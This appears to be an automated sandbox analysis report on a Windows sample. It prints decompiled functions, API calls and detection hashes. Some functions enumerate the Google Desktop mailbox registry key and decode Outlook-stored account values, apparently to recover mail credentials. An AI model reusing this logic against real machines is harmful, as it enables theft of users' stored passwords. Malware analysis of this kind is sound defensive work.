                                                                        				RECT* _t58;
                                                                        				intOrPtr _t66;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_push(__ecx);
                                                                        				_t66 = __ecx;
                                                                        				_v12 = __ecx;
                                                                        				if(_a4 != 5) {
                                                                        					if(_a4 != 0x24) {
                                                                        						if(_a4 == 0xf) {
                                                                        							E0040173B(__ecx + 0xc);
                                                                        						}
                                                                        					} else {
                                                                        						_t29 = _a12;
                                                                        						 *((intOrPtr*)(_t29 + 0x18)) = 0x190;
                                                                        						 *((intOrPtr*)(_t29 + 0x1c)) = 0xb4;
                                                                        					}
                                                                        				} else {
                                                                        					_t30 = BeginDeferWindowPos(0xb);
                                                                        					_t58 = _t66 + 0xc;
                                                                        					_v8 = _t30;
                                                                        					E0040169B(_t58, _t30, 0x3ed, 0, 0, 1);
                                                                        					E0040169B(_t58, _v8, 0x3ee, 0, 0, 1);
                                                                        					E0040169B(_t58, _v8, 0x3f4, 0, 0, 1);
                                                                        					E0040169B(_t58, _v8, 0x3ef, 0, 0, 1);
                                                                        					E0040169B(_t58, _v8, 0x3f0, 1, 0, 0);
                                                                        					E0040169B(_t58, _v8, 0x3f1, 1, 0, 0);
                                                                        					E0040169B(_t58, _v8, 0x3f5, 1, 0, 0);
                                                                        					E0040169B(_t58, _v8, 0x3f2, 1, 0, 0);
                                                                        					E0040169B(_t58, _v8, 0x3f3, 1, 1, 0);
                                                                        					E0040169B(_t58, _v8, 1, 1, 1, 0);
                                                                        					E0040169B(_t58, _v8, 2, 1, 1, 0);
                                                                        					EndDeferWindowPos(_v8);
                                                                        					InvalidateRect( *(_t58 + 0x10), _t58, 1);
                                                                        					_t66 = _v12;
                                                                        				}
                                                                        				return E004015AE(_t66, _a4, _a8, _a12);
                                                                        			}











                                                                        APIs
                                                                        • BeginDeferWindowPos.USER32 ref: 00405D07
                                                                          • Part of subcall function 0040169B: GetDlgItem.USER32 ref: 004016AB
                                                                          • Part of subcall function 0040169B: GetClientRect.USER32 ref: 004016BD
                                                                          • Part of subcall function 0040169B: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401727
                                                                        • EndDeferWindowPos.USER32(?), ref: 00405DD8
                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 00405DE3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                        • String ID: $
                                                                        • API String ID: 2498372239-3993045852
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040719C(void* __ecx, intOrPtr _a4) {
                                                                        				void _v259;
                                                                        				char _v260;
                                                                        				char _v264;
                                                                        				void* _v268;
                                                                        				void* _v276;
                                                                        				long _t17;
                                                                        				void* _t21;
                                                                        				void* _t24;
                                                                        				void* _t29;
                                                                        				int _t32;
                                                                        				signed int _t36;
                                                                        				void* _t39;
                                                                        				void* _t40;
                                                                        				void* _t41;
                                                                        
                                                                        				_t29 = __ecx;
                                                                        				_t17 = E0040EB3F(0x80000001, "Software\\Google\\Google Desktop\\Mailboxes",  &_v268);
                                                                        				_t39 = (_t36 & 0xfffffff8) - 0x108 + 0xc;
                                                                        				if(_t17 == 0) {
                                                                        					_t32 = 0;
                                                                        					_v260 = 0;
                                                                        					memset( &_v259, 0, 0xff);
                                                                        					_t40 = _t39 + 0xc;
                                                                        					_t21 = E0040EC05(_v268, 0,  &_v260);
                                                                        					while(1) {
                                                                        						_t41 = _t40 + 0xc;
                                                                        						if(_t21 != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t24 = E0040EB3F(_v268,  &_v260,  &_v264);
                                                                        						_t40 = _t41 + 0xc;
                                                                        						if(_t24 == 0) {
                                                                        							E0040706C(_t29, _a4, _v264,  &_v260);
                                                                        							RegCloseKey(_v276);
                                                                        						}
                                                                        						_t32 = _t32 + 1;
                                                                        						_t21 = E0040EC05(_v268, _t32,  &_v260);
                                                                        					}
                                                                        					_t17 = RegCloseKey(_v268);
                                                                        				}
                                                                        				return _t17;
                                                                        			}


















                                                                        APIs
                                                                          • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                        • memset.MSVCRT ref: 004071D7
                                                                          • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32 ref: 0040EC28
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407225
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407242
                                                                        Strings
                                                                        • Software\Google\Google Desktop\Mailboxes, xrefs: 004071AF
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close$EnumOpenmemset
                                                                        • String ID: Software\Google\Google Desktop\Mailboxes
                                                                        • API String ID: 2255314230-2212045309
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00401085(void* __esi, void* __eflags) {
                                                                        				struct tagLOGFONTA _v64;
                                                                        				int _t10;
                                                                        				long _t11;
                                                                        
                                                                        				E00406191( &_v64, "MS Sans Serif", 0xa, 1);
                                                                        				_t10 = CreateFontIndirectA( &_v64);
                                                                        				 *(__esi + 0x20c) = _t10;
                                                                        				_t11 = SendDlgItemMessageA( *(__esi + 4), 0x3ec, 0x30, _t10, 0);
                                                                        				if( *0x417388 != 0) {
                                                                        					return SendDlgItemMessageA( *(__esi + 4), 0x3ee, 0x30,  *(__esi + 0x20c), 0);
                                                                        				}
                                                                        				return _t11;
                                                                        			}







                                                                        APIs
                                                                          • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                                          • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                                        • CreateFontIndirectA.GDI32(?), ref: 004010A4
                                                                        • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 004010C3
                                                                        • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 004010E0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetstrcpy
                                                                        • String ID: MS Sans Serif
                                                                        • API String ID: 4251605573-168460110
                                                                        • Opcode ID: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
                                                                        • Instruction ID: 11d026e54a5ae2454c64c325e08d9e616df03e05f7163fa19ba200447038793b
                                                                        • Opcode Fuzzy Hash: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
                                                                        • Instruction Fuzzy Hash: 73F0A775A8034877E72167A0ED47F8A7BACAB40B00F10C135FB61B51E1D6F47554DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040DE43(void** __eax, struct HWND__* _a4) {
                                                                        				int _t6;
                                                                        				void** _t10;
                                                                        
                                                                        				_t10 = __eax;
                                                                        				if( *0x417510 == 0) {
                                                                        					memcpy(0x416e70,  *__eax, 0x50);
                                                                        					memcpy(0x416ba0,  *(_t10 + 4), 0x2cc);
                                                                        					 *0x417510 = 1;
                                                                        					_t6 = DialogBoxParamA( *0x416b94, 0x6b, _a4, E0040DB39, 0);
                                                                        					 *0x417510 =  *0x417510 & 0x00000000;
                                                                        					 *0x416b9c = _t6;
                                                                        					return 1;
                                                                        				} else {
                                                                        					return 1;
                                                                        				}
                                                                        			}






                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memcpy$DialogParam
                                                                        • String ID: V7
                                                                        • API String ID: 392721444-2959985473
                                                                        • Opcode ID: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
                                                                        • Instruction ID: 1a8743d5fef8bbef7923f2c95fec7d45d4f15d0a806a7122114c86eec2fd18b9
                                                                        • Opcode Fuzzy Hash: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
                                                                        • Instruction Fuzzy Hash: 93F0A7716843207BD7116F54AC06BC63BF2B704B5AF114926F149E40E1D3F56550CBCC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 58%
                                                                        			E004062D1(struct HWND__* _a4) {
                                                                        				void _v259;
                                                                        				char _v260;
                                                                        				signed int _t10;
                                                                        
                                                                        				_v260 = 0;
                                                                        				memset( &_v259, 0, 0xff);
                                                                        				GetClassNameA(_a4,  &_v260, 0xff);
                                                                        				_t10 =  &_v260;
                                                                        				_push("edit");
                                                                        				_push(_t10);
                                                                        				L004115B2();
                                                                        				asm("sbb eax, eax");
                                                                        				return  ~_t10 + 1;
                                                                        			}







                                                                        APIs
                                                                        • memset.MSVCRT ref: 004062F1
                                                                        • GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                                        • _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ClassName_stricmpmemset
                                                                        • String ID: edit
                                                                        • API String ID: 3665161774-2167791130
                                                                        • Opcode ID: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                                        • Instruction ID: 6efc07277a00def775dca084f59963aaad452a70fda198cb5006c56c80a8bddd
                                                                        • Opcode Fuzzy Hash: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                                        • Instruction Fuzzy Hash: 75E09BB3C4412A7ADB21A764DC05FE53BAC9F59305F0001B6BD46E10D5E5B497C887A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040EDAC() {
                                                                        				struct HINSTANCE__* _t1;
                                                                        				_Unknown_base(*)()* _t2;
                                                                        
                                                                        				if( *0x417520 == 0) {
                                                                        					_t1 = LoadLibraryA("shell32.dll");
                                                                        					 *0x417520 = _t1;
                                                                        					if(_t1 != 0) {
                                                                        						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathA");
                                                                        						 *0x41751c = _t2;
                                                                        						return _t2;
                                                                        					}
                                                                        				}
                                                                        				return _t1;
                                                                        			}






                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,73B74DE0,?,00000000), ref: 0040EDBA
                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                        • API String ID: 2574300362-543337301
                                                                        • Opcode ID: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                                        • Instruction ID: 9298da647e7f97f850720a93b521a1101e1548fa407b312faad19db7241a3124
                                                                        • Opcode Fuzzy Hash: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                                        • Instruction Fuzzy Hash: 4BD0C970649202EFC7008F21AE097813ABABB18703F10C537A506E1AA0F7B88190CF5C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E0040FE05(intOrPtr* __esi, void* __eflags) {
                                                                        				void* _t27;
                                                                        				intOrPtr _t28;
                                                                        				intOrPtr* _t29;
                                                                        				intOrPtr* _t44;
                                                                        
                                                                        				_t44 = __esi;
                                                                        				 *__esi = 0x414288;
                                                                        				_t27 = E00406549(0x46c, __esi);
                                                                        				_push(0x20);
                                                                        				L004115D0();
                                                                        				if(_t27 == 0) {
                                                                        					_t28 = 0;
                                                                        				} else {
                                                                        					_t28 = E00406A2C(_t27);
                                                                        				}
                                                                        				_push(0x20);
                                                                        				 *((intOrPtr*)(_t44 + 0x450)) = _t28;
                                                                        				L004115D0();
                                                                        				if(_t28 == 0) {
                                                                        					_t29 = 0;
                                                                        				} else {
                                                                        					_t29 = E00406A2C(_t28);
                                                                        				}
                                                                        				_push(0x14);
                                                                        				 *((intOrPtr*)(_t44 + 0x454)) = _t29;
                                                                        				L004115D0();
                                                                        				if(_t29 == 0) {
                                                                        					_t29 = 0;
                                                                        				} else {
                                                                        					 *((intOrPtr*)(_t29 + 0xc)) = 0;
                                                                        					 *_t29 = 0;
                                                                        					 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                        					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
                                                                        					 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                        				}
                                                                        				_push(0x14);
                                                                        				 *((intOrPtr*)(_t44 + 0x458)) = _t29;
                                                                        				L004115D0();
                                                                        				if(_t29 == 0) {
                                                                        					_t29 = 0;
                                                                        				} else {
                                                                        					 *((intOrPtr*)(_t29 + 0xc)) = 0;
                                                                        					 *_t29 = 0;
                                                                        					 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                        					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
                                                                        					 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                        				}
                                                                        				_push(0x14);
                                                                        				 *((intOrPtr*)(_t44 + 0x45c)) = _t29;
                                                                        				L004115D0();
                                                                        				if(_t29 == 0) {
                                                                        					_t29 = 0;
                                                                        				} else {
                                                                        					 *((intOrPtr*)(_t29 + 0xc)) = 0;
                                                                        					 *_t29 = 0;
                                                                        					 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                        					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
                                                                        					 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t44 + 0x460)) = _t29;
                                                                        				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x450)) + 0x14)) = 0x2000;
                                                                        				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x454)) + 0x14)) = 0x2000;
                                                                        				 *((intOrPtr*)(_t44 + 0x3c)) = 1;
                                                                        				 *((intOrPtr*)(_t44 + 0x40)) = 1;
                                                                        				 *((intOrPtr*)(_t44 + 0x44)) = 1;
                                                                        				 *((intOrPtr*)(_t44 + 0x48)) = 1;
                                                                        				return _t44;
                                                                        			}








                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??2@$memset
                                                                        • String ID:
                                                                        • API String ID: 1860491036-0
                                                                        • Opcode ID: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                                        • Instruction ID: d938b1c2a289ef47e5423cea375f2860c04713c819a512dfc676868f3ea794ac
                                                                        • Opcode Fuzzy Hash: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                                        • Instruction Fuzzy Hash: CC3146B0A107008FD7609F3AD845666FBE4EF80355F25887FD20ADB6B2E7B8D4448B59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040BD0B(void* __edi, void* __esi, void* _a4) {
                                                                        				signed int _t13;
                                                                        				signed int _t25;
                                                                        				int _t26;
                                                                        				char* _t30;
                                                                        				void* _t31;
                                                                        				void* _t33;
                                                                        				void* _t35;
                                                                        
                                                                        				_t35 = __esi;
                                                                        				_t25 = 0x3f;
                                                                        				_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;
                                                                        				_t30 = __esi + 0x18 + _t13;
                                                                        				 *_t30 = 0x80;
                                                                        				_t26 = _t25 - _t13;
                                                                        				_t31 = _t30 + 1;
                                                                        				if(_t26 >= 8) {
                                                                        					memset(_t31, 0, _t26 + 0xfffffff8);
                                                                        				} else {
                                                                        					memset(_t31, 0, _t26);
                                                                        					_t33 = __esi + 0x18;
                                                                        					E0040BD8A(_t33, __esi);
                                                                        					memset(_t33, 0, 0x38);
                                                                        				}
                                                                        				 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));
                                                                        				 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));
                                                                        				E0040BD8A(_t35 + 0x18, _t35);
                                                                        				memcpy(_a4, _t35, 0x10);
                                                                        				return memset(_t35, 0, 4);
                                                                        			}


                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memset$memcpy
                                                                        • String ID:
                                                                        • API String ID: 368790112-0
                                                                        • Opcode ID: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                                        • Instruction ID: 14e83d3a51f9c3b731822f35bbce0da2433a64988b134a744f8d54487411a0b4
                                                                        • Opcode Fuzzy Hash: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                                        • Instruction Fuzzy Hash: 6F01F5B1680B0026D2356B26CC02F9A77A5AFA0714F000B1EF643666D1D7ACE244869C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040246C(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
                                                                        				void _v2058;
                                                                        				char _v2060;
                                                                        				char _v2069;
                                                                        				char _v2070;
                                                                        				char _v2071;
                                                                        				char _v2072;
                                                                        				char _v3086;
                                                                        				signed char _v3090;
                                                                        				char _v3091;
                                                                        				char _v3092;
                                                                        				char* _v3096;
                                                                        				char _v3100;
                                                                        				short* _v3104;
                                                                        				int _v3108;
                                                                        				char _v3112;
                                                                        				void* __ebx;
                                                                        				void* _t49;
                                                                        				signed int _t61;
                                                                        				short* _t76;
                                                                        				void* _t83;
                                                                        				signed int _t87;
                                                                        				void* _t90;
                                                                        
                                                                        				_t83 = __eax;
                                                                        				_t73 = 0;
                                                                        				 *_a12 = 0;
                                                                        				_v3112 = 0x400;
                                                                        				_t49 = E0040EBA3(__ecx, _a4, _a8,  &_v3092,  &_v3112);
                                                                        				_t90 = (_t87 & 0xfffffff8) - 0xc28 + 0x10;
                                                                        				if(_t49 == 0) {
                                                                        					_v2069 = 0;
                                                                        					_v2070 = 0;
                                                                        					_v2071 = 0;
                                                                        					_v2072 = 0;
                                                                        					if(_v3092 != 1) {
                                                                        						if(_v3092 == 2 &&  *((intOrPtr*)(_t83 + 0xa94)) != 0) {
                                                                        							_v3100 = _v3112 - 1;
                                                                        							_v3096 =  &_v3091;
                                                                        							if(E00404811(_t83 + 0x890,  &_v3100, 0,  &_v3108) != 0) {
                                                                        								WideCharToMultiByte(0, 0, _v3104, _v3108, _a12, 0x7f, 0, 0);
                                                                        								LocalFree(_v3104);
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						if( *((intOrPtr*)(_t83 + 0x888)) != 0) {
                                                                        							if(_a16 == 0) {
                                                                        								E0040E988(_a12, _t83 + 0x87c,  &_v3090, 0x7f, 0);
                                                                        							} else {
                                                                        								_v2060 = 0;
                                                                        								memset( &_v2058, 0, 0x800);
                                                                        								_t90 = _t90 + 0xc;
                                                                        								_t76 =  &_v2060;
                                                                        								E0040E988(_t76, _t83 + 0x87c,  &_v3091, 0x400, 1);
                                                                        								WideCharToMultiByte(0, 0, _t76, 0xffffffff, _a12, 0x7f, 0, 0);
                                                                        							}
                                                                        							_t73 = 0;
                                                                        						}
                                                                        						_t79 = _a12;
                                                                        						if( *_a12 == _t73 && _v3112 >= 7 && _v3092 == 1 && _v3091 == 1) {
                                                                        							_t61 = _v3090 & 0x000000ff;
                                                                        							if(_t61 > 1 && _v3112 >= _t61 + 6) {
                                                                        								E00401DFD(_t79,  &_v3086, _t61);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return 0 |  *_a12 != _t73;
                                                                        			}


                                                                        APIs
                                                                          • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 0040252C
                                                                        • memset.MSVCRT ref: 004024F5
                                                                          • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                                          • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                                          • Part of subcall function 0040E988: memcpy.MSVCRT ref: 0040EA04
                                                                          • Part of subcall function 0040E988: CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 004025E4
                                                                        • LocalFree.KERNEL32(?), ref: 004025EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                        • String ID:
                                                                        • API String ID: 3503910906-0
                                                                        • Opcode ID: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                                        • Instruction ID: 8b275e149f62785490509d2466391155d2af3f8991a5b00387cc308873e1222d
                                                                        • Opcode Fuzzy Hash: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                                        • Instruction Fuzzy Hash: 7041B4B1408384BFD711DB608D44AEBBBDCBB48308F44493EFA98A21D1D678DA54DB5A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E0040A119(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				signed int _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				void* __ebx;
                                                                        				signed int _t63;
                                                                        				intOrPtr _t67;
                                                                        				intOrPtr _t72;
                                                                        				intOrPtr _t74;
                                                                        				signed int _t79;
                                                                        				void* _t84;
                                                                        				signed int _t86;
                                                                        				char* _t98;
                                                                        				void* _t100;
                                                                        				void* _t102;
                                                                        				void* _t104;
                                                                        				void* _t106;
                                                                        				void* _t107;
                                                                        
                                                                        				_t84 = __eax;
                                                                        				E0040892D(__eax, __eflags);
                                                                        				_t86 = 0;
                                                                        				_v12 = 0;
                                                                        				while(1) {
                                                                        					_t98 = _a4;
                                                                        					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
                                                                        						break;
                                                                        					}
                                                                        					_t86 = _t86 + 1;
                                                                        					if(_t86 < 1) {
                                                                        						continue;
                                                                        					}
                                                                        					if(strlen(_t98) >= 3) {
                                                                        						break;
                                                                        					}
                                                                        					_t79 = atoi(_a4);
                                                                        					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
                                                                        						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
                                                                        					}
                                                                        					L21:
                                                                        					if(_a8 != 0) {
                                                                        						_v12 = _v12 | 0x00001000;
                                                                        					}
                                                                        					_t63 = _v12;
                                                                        					 *0x41748c =  *0x41748c + 1;
                                                                        					 *((intOrPtr*)(0x417490 +  *0x41748c * 4)) = _t63;
                                                                        					return _t63;
                                                                        				}
                                                                        				_t104 = 0;
                                                                        				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
                                                                        				_v16 = 0;
                                                                        				_v8 = 0;
                                                                        				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
                                                                        					L14:
                                                                        					_t100 = 0;
                                                                        					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
                                                                        					_v8 = 0;
                                                                        					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
                                                                        						L20:
                                                                        						goto L21;
                                                                        					}
                                                                        					_t106 = 0;
                                                                        					__eflags = 0;
                                                                        					do {
                                                                        						_v20 = E004069D2(0, _a4);
                                                                        						_t67 = E004069D2(0, _a4);
                                                                        						__eflags = _v20;
                                                                        						if(_v20 >= 0) {
                                                                        							L18:
                                                                        							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
                                                                        							goto L19;
                                                                        						}
                                                                        						__eflags = _t67;
                                                                        						if(_t67 < 0) {
                                                                        							goto L19;
                                                                        						}
                                                                        						goto L18;
                                                                        						L19:
                                                                        						_v8 = _v8 + 1;
                                                                        						_t100 = _t100 + 0x10;
                                                                        						_t106 = _t106 + 0x14;
                                                                        						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
                                                                        					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
                                                                        					goto L20;
                                                                        				}
                                                                        				_t102 = 0;
                                                                        				__eflags = 0;
                                                                        				do {
                                                                        					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
                                                                        					_push(_a4);
                                                                        					_push(_t72);
                                                                        					L004115C4();
                                                                        					_push(_a4);
                                                                        					_v20 = _t72;
                                                                        					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
                                                                        					_push(_t74);
                                                                        					L004115C4();
                                                                        					_t107 = _t107 + 0x10;
                                                                        					__eflags = _v20;
                                                                        					if(_v20 == 0) {
                                                                        						L11:
                                                                        						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
                                                                        						_v16 = 1;
                                                                        						goto L12;
                                                                        					}
                                                                        					__eflags = _t74;
                                                                        					if(_t74 != 0) {
                                                                        						goto L12;
                                                                        					}
                                                                        					goto L11;
                                                                        					L12:
                                                                        					_v8 = _v8 + 1;
                                                                        					_t102 = _t102 + 0x10;
                                                                        					_t104 = _t104 + 0x14;
                                                                        					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
                                                                        				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
                                                                        				__eflags = _v16;
                                                                        				if(_v16 != 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				goto L14;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 0040892D: ??2@YAPAXI@Z.MSVCRT ref: 0040894E
                                                                          • Part of subcall function 0040892D: ??3@YAXPAX@Z.MSVCRT ref: 00408A15
                                                                        • strlen.MSVCRT ref: 0040A13F
                                                                        • atoi.MSVCRT ref: 0040A14D
                                                                        • _mbsicmp.MSVCRT ref: 0040A1A0
                                                                        • _mbsicmp.MSVCRT ref: 0040A1B3
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                        • String ID:
                                                                        • API String ID: 4107816708-0
                                                                        • Opcode ID: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                                        • Instruction ID: ad5e67b725479cd3c0fe98911646f79d6f4c04cefe3616236e53ea043d5b2769
                                                                        • Opcode Fuzzy Hash: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                                        • Instruction Fuzzy Hash: 24414B75900304AFCB10DFA9C580A9ABBF5FB48308F1084BEEC05AB392D7399A51CB59
